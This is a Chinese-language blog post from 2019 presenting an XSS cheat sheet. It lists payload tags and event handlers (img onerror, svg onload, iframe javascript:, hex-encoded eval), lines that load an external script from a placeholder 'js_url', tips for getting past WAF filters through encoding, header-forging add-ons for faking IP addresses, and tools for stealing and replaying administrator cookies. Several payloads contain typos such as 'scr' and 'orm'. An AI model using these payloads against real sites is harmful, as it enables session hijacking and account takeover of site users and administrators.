03.(4)XSS常见标签

2019-03-19  本文已影响0人  新一mghc

xss 就是在页面执行你想要的 js

IP ,Referer ,User-Agent, Cookie 等都可以修改。

服务器端经常使用document.boby.innerHtml 等函数动态生成 html 页面

一、常用函数、构造语句

1.常用函数

onclick 鼠标点击触发
onmousemove 当鼠标移动就触发
onload 当页面加载完成后触发傻

2.常用构造语句

<script scr="js_url"></script> 

<a href=javascrip:alert('xss')>s</a>  
//点 击 s时 运 行 alert('xss')

<iframesrc="javascript:alert(2)">
//若存在 X-frame 选项, Payload 失效。

<img  scr=1  onerror=alert('xss')> 
//当 找 不 到图 片 名 为 1 的 文 件 时, 执 行 alert('xss')
<video src=test.mp4 onerror=alert(‘1’);>//视频
<audio src=test.mp3 onerror=alert(‘1’);>//音乐

<orm action="Javascript:alert(1)"><input type=submit><isindex action="javascript:alert(1)" type=image>


<svg/onload=prompt(1);>
//SVG 是使用 XML 来描述二维图形和绘图程序的语言。
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)> 
// autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。
<textarea autofocus onfocus=alert(1)>
<video><source>
//这里也可以通过各种变形绕过 WAF



<img src=x onerror=appendChild(createElement('script')).src='js_url'  /> 

<iframe  src=javascript:alert('xss');height=0  width=0  /><iframe>
//利  用 iframe 的 scr 来  弹  窗 

<img  src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> 
//过滤了alert 来执行弹窗等等有很多的方法,

<svg onload=confirm``>

3.绕过方式

(1).编码绕过

Javascript 可以使用多种编码方式,如 16 进制、Unicode、HTML 等进行编码。
支持编码属性:
href=
action=
name=
background=
src=
data=

二、常用工具

1. win工具

Sky、Safe3WVS、Netsparker 等都可以挖掘出反射 XSS

2.firefox 浏览器和两个附件

  1. X-Forwarded-For Header
    因为PHP获取IP有3个函数。而X-Forwarded-For Header就是对其中一个函数X_FORWARDED_FOR起作用,X_FORWARDED_FOR 有个缺陷可以使客户端伪造任意 IP,当然包括字符串,但是对其他两个函数就不行了。
  2. Modify HeadersModify Headers
    可以伪造数据包内容,当然也可以伪造 HTTP_CLIENT_IP 来更改 IP。

3. 后续攻击工具

管理员的 cookies 和后台地址还有管理员浏览器版本等等你都可以获取到
桂林老兵 cookie 欺骗工具

优先级标签
<textarea> 标签

上一篇 下一篇

猜你喜欢

热点阅读